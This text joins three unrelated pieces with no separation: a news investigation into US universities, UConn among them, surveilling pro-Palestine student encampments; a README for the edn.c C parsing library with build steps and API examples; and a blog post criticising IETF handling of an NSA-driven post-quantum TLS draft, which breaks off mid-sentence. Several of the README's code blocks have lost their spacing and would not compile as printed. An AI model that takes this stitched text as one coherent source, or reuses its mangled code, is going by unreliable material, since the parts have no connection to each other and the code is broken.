One set of communication in the documents suggests that at one point, University of Connecticut administrators were watching the students in the on-campus encampment sleep. “They are just beginning to wake up. It’s still very quiet. Just a couple of police cars nearby,” a UConn administrator wrote to other officials that April.
U.S. universities, faced with the largest student protest movement in decades, used open-source intelligence to monitor the student-led movement for Palestine and to inform whether or not they would negotiate, and eventually, how they would clear the encampments. Emily Tucker, the executive director of the Center on Privacy and Technology at Georgetown Law, situated the development as part of the broader corporatization of U.S. higher education.
“Institutions that are supposed to be for the public good are these corporate products that make them into vehicles for wealth extraction via data products,” Tucker told The Intercept. “Universities are becoming more like for-profit branding machines, and at the same time, digital capitalism is exploding.”
At UConn, the relationship between the corporate world and higher education led to a brief panic among university administrators. After protesters, including members of UConn’s chapter of Students for Justice in Palestine and a campus group called Unchained,
blocked access
to a military aircraft manufacturing facility about 25 miles from campus, administrators went into a frenzy over what the military contractor would think.
“Ok. The P&W CEO is pretty upset with us about it right now and is pressing [University President] Radenka [Maric] for action,” wrote Nathan Fuerst to Kimberly Beardsley-Carr, both high-level UConn administrators. “Can you see if UConn PD can proactively reach out? If we can determine that no UConn Students were arrested, that would be immensely helpful.”
Fuerst was referring to a contractor for the Israeli military called Pratt & Whitney, a subsidiary of the $235 billion company formerly known as Raytheon — and a major UConn donor. Both UConn and Pratt & Whitney denied that the request occurred, pointing out that the military contractor has no CEO. Fuerst, Beardsley-Carr, and Maric did not respond to requests for comment.
Photo Illustration: Fei Liu / The Intercept
Beardsley-Carr, in her own email sent four minutes after Fuerst’s, repeated the request: “As you can see below, the President is getting pressure from the CEO of Pratt and Whitney.”
Whether the company made the request or if it was, as UConn spokesperson Stephanie Reitz told The Intercept, “a misunderstanding,” it’s clear from the communications that UConn administrators were concerned about what the weapons manufacturer would think — and sprang to action, gathering information on students because of it.
Pratt & Whitney has donated millions of dollars to various university initiatives, and in April 2024, the same month as the protest, it was announced that a building on campus would be rededicated as the “Pratt & Whitney Engineering Building.” A partnership between the school and the company received an honorable mention from the governor’s office, prompting a Pratt & Whitney program engineer to write in an email: “It’s wonderful! P&W and UCONN have done some great things together.”
After a flurry of emails over the Pratt & Whitney arrests, on April 25, the UConn administrators’ concerns were lifted. “Middletown PD provided me with the names of the 10 individuals arrested during the below incident. None of the arrestees are current students,” UConn Police Lieutenant Douglas Lussier wrote to Beardsley-Carr.
“You have no idea how happy you just made me,” Beardsley-Carr wrote back.
It’s not just UConn, but U.S. higher education as a whole that has a deep and long-standing relationship with military weapons manufacturers. Whether it is endowed professorships, “Lockheed Martin Days,” defense industry presence at career fairs, or private donations, the defense industry
has a hold
on U.S. higher education, especially at elite universities, which serve as training grounds for high-paying and influential careers.
“These universities are the epicenter, the home base, of the future generation of Americans, future policy makers,” said Tariq Kenney-Shawa, Al-Shabaka’s U.S. Policy Fellow. If universities “were so confident in Israel’s narrative and their narrative being the correct one,” Kenney-Shawa added, “they would let that debate in such important spaces play out.”
Some students who spoke with The Intercept
emphasized that as a result of the surveillance they encountered during the protests, they have stepped up their digital security, using burner phones and limiting communication about potential demonstrations to secure messaging channels.
“The campus is waiting and watching for these kinds of things,” said Kirk Wolff, a student at the University of Virginia who said he was threatened with expulsion for a
one-man sit-in
he staged on campus and expressed fear that university administrators would read his emails.
The surveillance had a “chilling effect,” in his experience, Wolff said. “I had so many people tell me that they wanted to join me, that they agreed with me, and that they simply could not, because they were scared that the school would turn over their information.”
The University of Virginia did not respond to a request for comment on Wolff’s claims.
The surveillance detailed in this investigation took place under the Biden administration, before Trump returned to power and dragged the crackdown on pro-Palestine dissent into the open. Universities have since
shared employee and student files
with the Trump administration as it continues to investigate “anti-Semitic incidents on campus” — and use the findings as pretext to defund universities or even target students for illegal deportation.
Any open-source intelligence universities gathered could become fair game for federal law enforcement agencies as they work to punish those involved in the student-led movement for Palestine, Mir noted.
“A groundwork of surveillance has been built slowly on many college campuses for decades,” he said. “Now very plainly and publicly we have seen it weaponized against speech.”
Research support provided by the nonprofit newsroom Type Investigations.
edn.c: A fast, zero-copy EDN (Extensible Data Notation) reader written in C11 with SIMD acceleration
Extensible via tagged literals
:
#inst "2024-01-01"
,
#uuid "..."
—transform data at parse time with custom readers
Human-friendly
: Comments, flexible whitespace, designed to be readable and writable by both humans and programs
Language-agnostic
: Originally from Clojure, but useful anywhere you need rich, extensible data interchange
Why EDN over JSON?
More expressive types (keywords, symbols, sets), native extensibility through tags (no more
{"__type": "Date", "value": "..."}
hacks), and better support for configuration files and data interchange in functional programming environments.
Windows
(x86_64, ARM64) - NEON/SSE4.2 SIMD via MSVC/MinGW/Clang
WebAssembly
- SIMD128 support for browsers and Node.js
Build Library
Unix/macOS/Linux:
# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c
# Build static library (libedn.a)
make
# Run tests to verify build
make test
Windows:
# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c
# Build with CMake (works with MSVC, MinGW, Clang)
.\build.bat

# Or use PowerShell script
.\build.ps1 -Test
# Compile your code
gcc -o myapp myapp.c -I/path/to/edn.c/include -L/path/to/edn.c -ledn
# Or add to your Makefile
CFLAGS += -I/path/to/edn.c/include
LDFLAGS += -L/path/to/edn.c -ledn
Option 2: Include source directly
Copy
include/edn.h
and all files from
src/
into your project and compile them together.
Quick Start
#include"edn.h"#include<stdio.h>intmain(void) {
constchar*input="{:name \"Alice\" :age 30 :languages [:clojure :rust]}";
// Read EDN stringedn_result_tresult=edn_read(input, 0);
if (result.error!=EDN_OK) {
fprintf(stderr, "Parse error at line %zu, column %zu: %s\n",
result.error_line, result.error_column, result.error_message);
return1;
}
// Access the parsed mapedn_value_t*map=result.value;
printf("Parsed map with %zu entries\n", edn_map_count(map));
// Look up a value by keyedn_result_tkey_result=edn_read(":name", 0);
edn_value_t*name_value=edn_map_lookup(map, key_result.value);
if (name_value!=NULL&&edn_type(name_value) ==EDN_TYPE_STRING) {
size_tlen;
constchar*name=edn_string_get(name_value, &len);
printf("Name: %.*s\n", (int)len, name);
}
// Clean up - frees all allocated memoryedn_free(key_result.value);
edn_free(map);
return0;
}
Output:
Parsed map with 3 entries
Name: Alice
Whitespace and Control Characters
EDN.C follows Clojure's exact behavior for whitespace and control character handling:
Whitespace Characters
The following characters act as
whitespace delimiters
(separate tokens):
Character   Hex    Name                    Common Use
(space)     0x20   Space                   Standard spacing
\t          0x09   Tab                     Indentation
\n          0x0A   Line Feed (LF)          Unix line ending
\r          0x0D   Carriage Return (CR)    Windows line ending
\f          0x0C   Form Feed               Page break
\v          0x0B   Vertical Tab            Vertical spacing
,           0x2C   Comma                   Optional separator
FS          0x1C   File Separator          Data separation
GS          0x1D   Group Separator         Data separation
RS          0x1E   Record Separator        Data separation
US          0x1F   Unit Separator          Data separation
Examples:
// All of these parse as vectors with 3 elements:
edn_read("[1 2 3]", 0);       // spaces
edn_read("[1,2,3]", 0);       // commas
edn_read("[1\t2\n3]", 0);     // tabs and newlines
edn_read("[1\f2\x1C3]", 0);   // form feed and file separator
Control Characters in Identifiers
Control characters
0x00-0x1F
(except whitespace delimiters) are
valid in identifiers
(symbols and keywords):
// Backspace in symbol - valid!
edn_result_t r = edn_read("[\bfoo]", 0);   // 1-element vector
edn_vector_count(r.value);                 // Returns 1
edn_free(r.value);

// Control characters in middle of identifier
const char input[] = {'[', 'f', 'o', 'o', 0x08, 'b', 'a', 'r', ']', 0};
r = edn_read(input, sizeof(input) - 1);
edn_vector_count(r.value);                 // Returns 1 (symbol: "foo\bbar")
edn_free(r.value);

// Versus whitespace - separates into 2 elements
edn_result_t r2 = edn_read("[foo\tbar]", 0);   // Tab is whitespace
edn_vector_count(r2.value);                    // Returns 2 (symbols: "foo" and "bar")
edn_free(r2.value);
Note on null bytes (
0x00
):
When using string literals with
strlen()
, null bytes will truncate the string. Always pass explicit length for data containing null bytes:
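A minimal sketch of the explicit-length pattern (mirroring the control-character example above, but with an embedded 0x00 that strlen() would stop at):

#include "edn.h"
#include <stdio.h>

int main(void) {
    // An embedded 0x00 inside an identifier: pass the explicit length, not 0.
    const char input[] = {'[', 'f', 'o', 'o', 0x00, 'b', 'a', 'r', ']', 0};
    edn_result_t r = edn_read(input, sizeof(input) - 1);
    if (r.error == EDN_OK) {
        printf("elements: %zu\n", edn_vector_count(r.value));  // expected: 1
    }
    edn_free(r.value);
    return 0;
}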
edn_string_get(): Get UTF-8 string data. Returns NULL if value is not a string.
Lazy decoding:
For strings without escapes, returns a pointer into the original input (zero-copy). For strings with escapes (
\n
,
\t
,
\"
, etc.), decodes and caches the result on first call.
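A small sketch of how the two cases behave, using only the functions shown above (the zero-copy detail is internal; both calls simply return valid string data):

#include "edn.h"
#include <stdio.h>

int main(void) {
    // No escapes: the returned pointer can reference the original input (zero-copy).
    edn_result_t plain = edn_read("\"hello world\"", 0);
    size_t len;
    const char *s = edn_string_get(plain.value, &len);
    printf("plain:   %.*s\n", (int)len, s);

    // With escapes: decoded (and cached) on the first call.
    edn_result_t escaped = edn_read("\"line one\\nline two\"", 0);
    const char *t = edn_string_get(escaped.value, &len);
    printf("escaped: %.*s\n", (int)len, t);  // contains a real newline

    edn_free(plain.value);
    edn_free(escaped.value);
    return 0;
}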
Automatic Reduction:
Ratios are automatically reduced to lowest terms using the Binary GCD algorithm (Stein's algorithm):
6/9
→ Reduced to
2/3
100/25
→ Reduced to
4/1
→ Returns as integer
4
Restrictions:
Only decimal (base-10) integers supported for both numerator and denominator
Octal-looking (base-8) integers are accepted, keeping compatibility with Clojure, where they are
incorrectly
interpreted as decimal integers with leading zeros.
Both numerator and denominator must fit in
int64_t
Denominator must be positive (negative denominators are rejected)
Denominator cannot be zero
No whitespace allowed around
/
Hex and binary notations not supported for ratios
Example:
// Parse ratio
edn_result_t r = edn_read("22/7", 0);
if (r.error == EDN_OK && edn_type(r.value) == EDN_TYPE_RATIO) {
    int64_t num, den;
    edn_ratio_get(r.value, &num, &den);
    printf("Ratio: %lld/%lld\n", (long long)num, (long long)den);
    // Output: Ratio: 22/7

    // Convert to double for approximation
    double approx;
    edn_number_as_double(r.value, &approx);
    printf("Approximation: %.10f\n", approx);
    // Output: Approximation: 3.1428571429
}
edn_free(r.value);

// Automatic reduction
edn_result_t r2 = edn_read("3/6", 0);
int64_t num2, den2;
edn_ratio_get(r2.value, &num2, &den2);
// num2 = 1, den2 = 2 (reduced from 3/6)
edn_free(r2.value);

// Reduction to integer
edn_result_t r3 = edn_read("10/5", 0);
assert(edn_type(r3.value) == EDN_TYPE_INT);
int64_t int_val;
edn_int64_get(r3.value, &int_val);
// int_val = 2 (10/5 reduced to 2/1, returned as integer)
edn_free(r3.value);

// Negative ratios
edn_result_t r4 = edn_read("-3/4", 0);
int64_t num4, den4;
edn_ratio_get(r4.value, &num4, &den4);
// num4 = -3, den4 = 4 (numerator is negative, denominator is positive)
edn_free(r4.value);

// Error: zero denominator
edn_result_t r5 = edn_read("5/0", 0);
// r5.error == EDN_ERROR_INVALID_NUMBER
// r5.error_message == "Ratio denominator cannot be zero"

// Error: negative denominator (denominators must be positive)
edn_result_t r6 = edn_read("3/-4", 0);
// r6.error == EDN_ERROR_INVALID_NUMBER
// r6.error_message == "Ratio denominator must be positive"

// Error: hex not supported
edn_result_t r7 = edn_read("0x10/2", 0);
// Parses 0x10 as int, not as ratio
Build Configuration:
This feature is disabled by default. To enable it:
Make:
make RATIO=1
CMake:
cmake -DEDN_ENABLE_RATIO=ON ..
make
When disabled (default):
EDN_TYPE_RATIO
enum value is not available
edn_ratio_get()
function is not available
Note:
Ratios are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's clojure.edn parser.
See
test/test_numbers.c
for comprehensive ratio test examples.
Extended Integer Formats
EDN.C supports Clojure-style special integer formats for hexadecimal, octal, binary, and arbitrary radix numbers. These are
disabled by default
as they are not part of the base EDN specification.
In radix notation (NrDDDD), N is the radix and DDDD
are the digits (0-9, A-Z, case-insensitive for bases > 10)
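Assuming the library was built with extended integers enabled (see the build flags below), parsing the formats mentioned above might look roughly like this:

#include "edn.h"
#include <stdint.h>
#include <stdio.h>

int main(void) {
    // Literals taken from the formats listed above; requires the extended-integers build flag.
    const char *inputs[] = {"0xFF", "2r1010", "36rZZ"};
    for (int i = 0; i < 3; i++) {
        edn_result_t r = edn_read(inputs[i], 0);
        if (r.error == EDN_OK && edn_type(r.value) == EDN_TYPE_INT) {
            int64_t v;
            edn_int64_get(r.value, &v);
            printf("%-7s -> %lld\n", inputs[i], (long long)v);
        }
        edn_free(r.value);
    }
    // Expected: 0xFF -> 255, 2r1010 -> 10, 36rZZ -> 1295
    return 0;
}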
Build Configuration:
This feature is disabled by default. To enable it:
Make:
make EXTENDED_INTEGERS=1
CMake:
cmake -DEDN_ENABLE_EXTENDED_INTEGERS=ON ..
make
When disabled (default):
Hexadecimal (
0xFF
), binary (
2r1010
), and radix notation (
36rZZ
) will fail to parse
Leading zeros are forbidden
: Numbers like
01
,
0123
,
0777
are rejected (per EDN spec)
Only
0
itself, or
0.5
,
0e10
(floats starting with zero) are allowed
Note:
Extended integer formats are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's reader.
See
test/test_numbers.c
for comprehensive extended integer format test examples.
Underscore in Numeric Literals
EDN.C supports underscores as visual separators in numeric literals for improved readability. This feature is
disabled by default
as it's not part of the base EDN specification.
Underscores are only allowed
between digits
(not at start, end, or adjacent to special characters)
Multiple consecutive underscores are allowed:
4____2
is valid
Not allowed adjacent to decimal point:
123_.5
or
123._5
are invalid
Not allowed before/after exponent marker:
123_e10
or
123e_10
are invalid
Not allowed before suffix:
123_N
or
123.45_M
are invalid
Works with negative numbers:
-1_234
→
-1234
Examples:
// Credit card number formatting
edn_result_t r1 = edn_read("1234_5678_9012_3456", 0);
int64_t val1;
edn_int64_get(r1.value, &val1);
// val1 = 1234567890123456
edn_free(r1.value);

// Pi with digit grouping
edn_result_t r2 = edn_read("3.14_15_92_65_35_89_79", 0);
double val2;
edn_double_get(r2.value, &val2);
// val2 = 3.141592653589793
edn_free(r2.value);

// Hex bytes (requires EXTENDED_INTEGERS=1)
edn_result_t r3 = edn_read("0xFF_EC_DE_5E", 0);
int64_t val3;
edn_int64_get(r3.value, &val3);
// val3 = 0xFFECDE5E
edn_free(r3.value);

// Large numbers with thousands separators
edn_result_t r4 = edn_read("1_000_000", 0);
int64_t val4;
edn_int64_get(r4.value, &val4);
// val4 = 1000000
edn_free(r4.value);

// In collections
edn_result_t r5 = edn_read("[1_000 2_000 3_000]", 0);
// Three integers: 1000, 2000, 3000
edn_free(r5.value);
Invalid examples:
// Underscore at start - parses as symbol
edn_read("_123", 0);      // Symbol, not number

// Underscore at end
edn_read("123_", 0);      // Error: EDN_ERROR_INVALID_NUMBER

// Adjacent to decimal point
edn_read("123_.5", 0);    // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123._5", 0);    // Error: EDN_ERROR_INVALID_NUMBER

// Before/after exponent marker
edn_read("123_e10", 0);   // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123e_10", 0);   // Error: EDN_ERROR_INVALID_NUMBER

// Before suffix
edn_read("123_N", 0);     // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123.45_M", 0);  // Error: EDN_ERROR_INVALID_NUMBER
Build Configuration:
This feature is disabled by default. To enable it:
Make:
make UNDERSCORE_IN_NUMERIC=1
CMake:
cmake -DEDN_ENABLE_UNDERSCORE_IN_NUMERIC=ON ..
make
Combined with other features:
# Enable underscores with extended integers and ratios
make UNDERSCORE_IN_NUMERIC=1 EXTENDED_INTEGERS=1 RATIO=1
When disabled (default):
Numbers with underscores will fail to parse
The scanner will stop at the first underscore, treating it as an invalid number
Note:
Underscores in numeric literals are a common feature in modern programming languages (Java, Rust, Python 3.6+, etc.) but are not part of the official EDN specification. This feature is provided for convenience and readability.
See
test/test_underscore_numeric.c
for comprehensive test examples.
A reader function receives the wrapped value and transforms it into a new representation. On error, set
error_message
to a static string and return NULL.
Parse Options
typedef struct {
    edn_reader_registry_t *reader_registry;         // Optional reader registry
    edn_value_t *eof_value;                         // Optional value to return on EOF
    edn_default_reader_mode_t default_reader_mode;
} edn_parse_options_t;

edn_result_t edn_read_with_options(const char *input, size_t length,
                                   const edn_parse_options_t *options);
Parse options fields:
reader_registry
: Optional reader registry for tagged literal transformations
eof_value
: Optional value to return when EOF is encountered instead of an error
default_reader_mode
: Behavior for unregistered tags (see below)
Default reader modes:
EDN_DEFAULT_READER_PASSTHROUGH
: Return
EDN_TYPE_TAGGED
for unregistered tags (default)
EDN_DEFAULT_READER_UNWRAP
: Discard tag, return wrapped value
EDN_DEFAULT_READER_ERROR
: Fail with
EDN_ERROR_UNKNOWN_TAG
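As a small illustration of default_reader_mode, the sketch below (based only on the options and modes listed above) parses an unregistered #inst tag with EDN_DEFAULT_READER_UNWRAP, which should yield the wrapped string rather than a tagged value:

#include "edn.h"
#include <stdio.h>

int main(void) {
    // UNWRAP mode: an unregistered tag is dropped and the wrapped value is kept.
    edn_parse_options_t opts = {
        .reader_registry = NULL,
        .eof_value = NULL,
        .default_reader_mode = EDN_DEFAULT_READER_UNWRAP
    };
    edn_result_t r = edn_read_with_options("#inst \"2024-01-01\"", 0, &opts);
    if (r.error == EDN_OK && edn_type(r.value) == EDN_TYPE_STRING) {
        size_t len;
        const char *s = edn_string_get(r.value, &len);
        printf("unwrapped: %.*s\n", (int)len, s);  // unwrapped: 2024-01-01
    }
    edn_free(r.value);
    return 0;
}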
EOF Value Handling:
By default, when the parser encounters end-of-file (empty input, whitespace-only input, or after
#_
discard), it returns
EDN_ERROR_UNEXPECTED_EOF
. You can customize this behavior by providing an
eof_value
in the parse options:
// First, create an EOF sentinel value
edn_result_t eof_sentinel = edn_read(":eof", 0);

// Configure parse options with EOF value
edn_parse_options_t options = {
    .reader_registry = NULL,
    .eof_value = eof_sentinel.value,
    .default_reader_mode = EDN_DEFAULT_READER_PASSTHROUGH
};

// Parse whitespace-only input that results in EOF
edn_result_t result = edn_read_with_options("   ", 3, &options);

// Instead of EDN_ERROR_UNEXPECTED_EOF, returns EDN_OK with eof_value
if (result.error == EDN_OK) {
    // result.value == eof_sentinel.value
    const char *name;
    edn_keyword_get(result.value, NULL, NULL, &name, NULL);
    // name == "eof"
}

// Clean up
edn_free(eof_sentinel.value);
Reader Example
#include"edn.h"#include"../src/edn_internal.h"// For edn_arena_alloc// Reader that uppercases keywordsstaticedn_value_t*upper_reader(edn_value_t*value, edn_arena_t*arena,
constchar**error_message) {
if (edn_type(value) !=EDN_TYPE_KEYWORD) {
*error_message="#upper requires keyword";
returnNULL;
}
constchar*name;
size_tname_len;
edn_keyword_get(value, NULL, NULL, &name, &name_len);
// Allocate uppercase name in arenachar*upper= (char*)edn_arena_alloc(arena, name_len+1);
if (!upper) {
*error_message="Out of memory";
returnNULL;
}
for (size_ti=0; i<name_len; i++) {
charc=name[i];
upper[i] = (c >= 'a'&&c <= 'z') ? (c-32) : c;
}
upper[name_len] ='\0';
// Create new keyword valueedn_value_t*result=edn_arena_alloc_value(arena);
if (!result) {
*error_message="Out of memory";
returnNULL;
}
result->type=EDN_TYPE_KEYWORD;
result->as.keyword.name=upper;
result->as.keyword.name_length=name_len;
result->as.keyword.namespace=NULL;
result->as.keyword.ns_length=0;
result->arena=arena;
returnresult;
}
intmain(void) {
// Create registry and register readeredn_reader_registry_t*registry=edn_reader_registry_create();
edn_reader_register(registry, "upper", upper_reader);
// Parse with custom readeredn_parse_options_topts= {
.reader_registry=registry,
.default_reader_mode=EDN_DEFAULT_READER_PASSTHROUGH
};
edn_result_tr=edn_read_with_options("#upper :hello", 0, &opts);
if (r.error==EDN_OK) {
constchar*name;
size_tlen;
edn_keyword_get(r.value, NULL, NULL, &name, &len);
printf(":%.*s\n", (int)len, name); // Output: :HELLO
}
edn_free(r.value);
edn_reader_registry_destroy(registry);
return0;
}
See
examples/reader.c
for more complete examples including timestamp conversion, vector extraction, and namespaced tags.
Map Namespace Syntax
EDN.C supports Clojure's map namespace syntax extension, which allows you to specify a namespace that gets automatically applied to all non-namespaced keyword keys in a map.
Extended Character Literals
EDN.C optionally supports extra character literals such as \formfeed, \backspace, and octal escapes (\oNNN). This feature is disabled by default. To enable it:
Make:
make EXTENDED_CHARACTERS=1
CMake:
cmake -DEDN_ENABLE_EXTENDED_CHARACTERS=ON ..
make
When disabled (default):
\formfeed
and
\backspace
will fail to parse
\oNNN
will fail to parse
Standard character literals still work:
\newline
,
\tab
,
\space
,
\return
,
\uXXXX
, etc.
See
examples/example_extended_characters.c
for more details.
Metadata
EDN.C supports Clojure-style metadata syntax, which allows attaching metadata maps to values.
Syntax variants:
Map metadata
:
^{:key val} form
- metadata is the map itself
Keyword shorthand
:
^:keyword form
- expands to
{:keyword true}
String tag
:
^"string" form
- expands to
{:tag "string"}
Symbol tag
:
^symbol form
- expands to
{:tag symbol}
Vector param-tags
:
^[type1 type2] form
- expands to
{:param-tags [type1 type2]}
Chaining
: Multiple metadata can be chained:
^meta1 ^meta2 form
- metadata maps are merged from right to left.
Example:
#include"edn.h"#include<stdio.h>intmain(void) {
// Parse with keyword shorthandedn_result_tresult=edn_read("^:private my-var", 0);
if (result.error==EDN_OK) {
// Check if value has metadataif (edn_value_has_meta(result.value)) {
edn_value_t*meta=edn_value_meta(result.value);
// Metadata is always a mapprintf("Metadata entries: %zu\n", edn_map_count(meta));
// Look up specific metadata keyedn_result_tkey=edn_read(":private", 0);
edn_value_t*val=edn_map_lookup(meta, key.value);
// val will be boolean trueedn_free(key.value);
}
edn_free(result.value);
}
return0;
}
More examples:
// Map metadata
edn_read("^{:doc \"A function\" :test true} my-fn", 0);

// String tag
edn_read("^\"String\" [1 2 3]", 0);
// Expands to: ^{:tag "String"} [1 2 3]

// Symbol tag
edn_read("^Vector [1 2 3]", 0);
// Expands to: ^{:tag Vector} [1 2 3]

// Vector param-tags
edn_read("^[String long _] my-fn", 0);
// Expands to: ^{:param-tags [String long _]} my-fn

// Chained metadata
edn_read("^:private ^:dynamic ^{:doc \"My var\"} x", 0);
// All metadata merged into one map
Supported value types:
Metadata can only be attached to:
Collections: lists, vectors, maps, sets
Tagged literals
Symbols
Note:
Metadata cannot be attached to scalar values (nil, booleans, numbers, strings, keywords).
API:
// Check if value has metadata
bool edn_value_has_meta(const edn_value_t *value);

// Get metadata map (returns NULL if no metadata)
edn_value_t *edn_value_meta(const edn_value_t *value);
Build Configuration:
This feature is disabled by default. To enable it:
Make:
CMake:
cmake -DEDN_ENABLE_METADATA=ON ..
make
When disabled (default):
^
is treated as a valid character in identifiers (symbols/keywords)
^test
parses as a symbol named "^test"
Metadata API functions are not available
Note:
Metadata is a Clojure language feature, not part of the official EDN specification. It's provided here for compatibility with Clojure's reader.
See
examples/example_metadata.c
for more details.
Text Blocks
Experimental feature
that adds Java-style multi-line text blocks with automatic indentation stripping to EDN. Requires
EDN_ENABLE_TEXT_BLOCKS
compilation flag (disabled by default).
Text blocks start with three double quotes followed by a newline (
"""\n
) and end with three double quotes (
"""
):
{:query""" SELECT * FROM users WHERE age > 21"""}
Features:
Automatic indentation stripping (common leading whitespace removed)
Closing
"""
position determines base indentation level
Closing on own line adds trailing newline, on same line doesn't
Trailing whitespace automatically removed from each line
Minimal escaping: only
\"""
to include literal triple quotes
Returns standard EDN string (no special type needed)
Example:
#include"edn.h"#include<stdio.h>intmain(void) {
constchar*input="{:sql \"\"\"\n"" SELECT * FROM users\n"" WHERE age > 21\n"" ORDER BY name\n"" \"\"\""}";
edn_result_tresult=edn_read(input, 0);
if (result.error==EDN_OK) {
edn_result_tkey=edn_read(":sql", 0);
edn_value_t*val=edn_map_lookup(result.value, key.value);
// Text block returns a regular string with indentation strippedsize_tlen;
constchar*sql=edn_string_get(val, &len);
printf("%s\n", sql);
// Output:// SELECT * FROM users// WHERE age > 21// ORDER BY nameedn_free(key.value);
edn_free(result.value);
}
return0;
}
Indentation Rules (Java JEP 378)
:
Find minimum indentation across all non-blank lines
Closing
"""
position also determines indentation
Strip that amount from each line
If closing
"""
is on its own line, add trailing
\n
This feature is disabled by default. To enable it:
Make:
CMake:
cmake -DEDN_ENABLE_TEXT_BLOCKS=ON ..
make
When disabled (default):
"""\n
pattern is parsed as a regular string
No automatic indentation processing
Note:
Text blocks are an experimental feature and not part of the official EDN specification.
See
examples/example_text_block.c
for more examples.
Examples
Interactive TUI Viewer
EDN.C includes an interactive terminal viewer for exploring EDN data:
# Build the TUI
make tui
# Explore data interactively
./examples/edn_tui data.edn
# Use arrow keys to navigate, Enter/Space to expand/collapse, q to quit
CLI Tool
EDN.C includes a command-line tool for parsing and pretty-printing EDN files:
# Build the CLI
make cli
# Parse and pretty-print a file
./examples/edn_cli data.edn
# Or from stdin
echo '{:name "Alice" :age 30}' | ./examples/edn_cli
More examples available in the
examples/
directory.
Building
Standard Build (Unix/macOS/Linux)
# Build library (libedn.a)
make
# Build and run all tests
make test

# Build and run single test
make test/test_numbers
./test/test_numbers
# Build with debug symbols and sanitizers (ASAN/UBSAN)
make DEBUG=1
# Run benchmarks
make bench # Quick benchmark
make bench-all   # All benchmarks

# Clean build artifacts
make clean
# Show build configuration
make info
Windows Build
EDN.C fully supports Windows with MSVC, MinGW, and Clang. Choose your preferred method:
Quick Start (CMake - Recommended):
# Using the provided build script
.\build.bat

# Or with PowerShell
.\build.ps1 -Test
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
2025.11.23: NSA and IETF, part 3:
Dodging the issues at hand. #pqcrypto #hybrids #nsa #ietf #dodging
Normal practice
in deploying post-quantum cryptography is to deploy ECC+PQ.
IETF's TLS working group is standardizing ECC+PQ.
But IETF management is also non-consensually ramming a particular NSA-driven document
through the IETF process,
a "non-hybrid" document that adds
just PQ
as another TLS option.
Don't worry: we're standardizing cars with seatbelts.
Also, recognizing generous funding from the National Morgue Association,
we're going to standardize cars
without
seatbelts as another option,
ignoring the safety objections.
That's okay, right?
Last month I posted
part 1
of this story.
Today's
part 2
highlighted the corruption.
This blog post, part 3,
highlights the dodging in a particular posting at the beginning of this month
by an IETF "security area director".
Part 4
will give an example of how
dissent on this topic has been censored.
Consensus means whatever the people in power want to do.
Recall from my previous blog post that
"adoption" of a document is a preliminary step
before an IETF "working group" works on, and decides whether to standardize, the document.
In April 2025,
the chairs of the IETF TLS WG called for "adoption" of this NSA-driven document.
During the call period,
20 people expressed unequivocal support for adoption,
2 people expressed conditional support for adoption,
and 7 people expressed unequivocal opposition to adoption.
(
Details for verification.
)
Before the chairs could even reply,
an "area director"
interrupted
,
claiming, inter alia, the following:
"There is clearly consensus
based on the 67 responses to the adoption call. ...
The vast majority was in favour of adoption ...
There were a few dissenting opinions".
After these lies by the "area director" were
debunked
,
the chairs said that they had declared consensus
"because there is clearly sufficient interest to work on this draft"
specifically "enough people willing to review the draft".
I can understand not everybody being familiar with
the specific definition of "consensus" that
antitrust law
requires standards-development organizations to follow.
But it's astonishing to see chairs substituting a consensus-evaluation procedure
that simply ignores objections.
Stonewalling.
The chairs said I could escalate.
IETF procedures say that an unresolved dispute can be brought
"to the attention of the Area Director(s) for the area in which the Working Group is chartered",
and then "The Area Director(s) shall attempt to resolve the dispute".
I filed a complaint with the "security area directors"
in
early June 2025
.
One of them never replied.
The other,
the same one who had claimed that there was "clearly consensus",
sent a
series of excuses
for not handling the complaint.
For example, one excuse was that the PDF format "discourages participation".
Do IETF procedures say "The Area Director(s) shall attempt to resolve the dispute
unless the dispute is documented in a PDF"?
No.
I sent email two days later
systematically addressing the excuses.
The "area director" never replied.
It isn't clear under IETF procedures whether a non-reply allows an appeal.
It is, however, clear that an appeal
can't
be filed after two months.
I escalated to the "Internet Engineering Steering Group" (IESG)
in
August 2025
.
(These aren't even marginally independent groups.
The "area directors" are the IESG members.
IESG appoints the WG chairs.)
IESG didn't reply until October 2025.
It rejected one of the "Area Director" excuses for having ignored my complaint,
but endorsed another excuse.
I promptly filed a
revised complaint
with the "area director",
jumping through the hoops that IESG had set.
There were then further
runarounds
.
The switch.
Suddenly,
on 1 November 2025,
IESG publicly instructed the "area director" to address the following question:
"Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the
TLS Working Group appropriately called by the WG chairs?"
The "area director" posted his conclusion mere hours later:
"I agree with the TLS WG Chairs that the Adoption Call result
was that there was rough consensus to adopt the document".
Dodging procedural objections.
Before looking at how the "area director" argued for this conclusion,
I'd like to emphasize three things that the "area director"
didn't
do.
First,
did the "area director" address my
complaint
about the chair action on this topic?
No.
One reason this matters is that
the law requires standards-development organizations to provide an
"appeals process"
.
Structurally,
the "area director" isn't quoting and answering the points in my complaint;
the "area director" puts the entire burden on the reader
to try to figure out what's supposedly answering what,
and to realize that many points remain unanswered.
Second,
did the "area director" address the chairs claiming that
"we have consensus to adopt this draft"?
Or the previous claim from the "area director"
that there was "clearly consensus"?
No.
Instead IESG and this "area director"
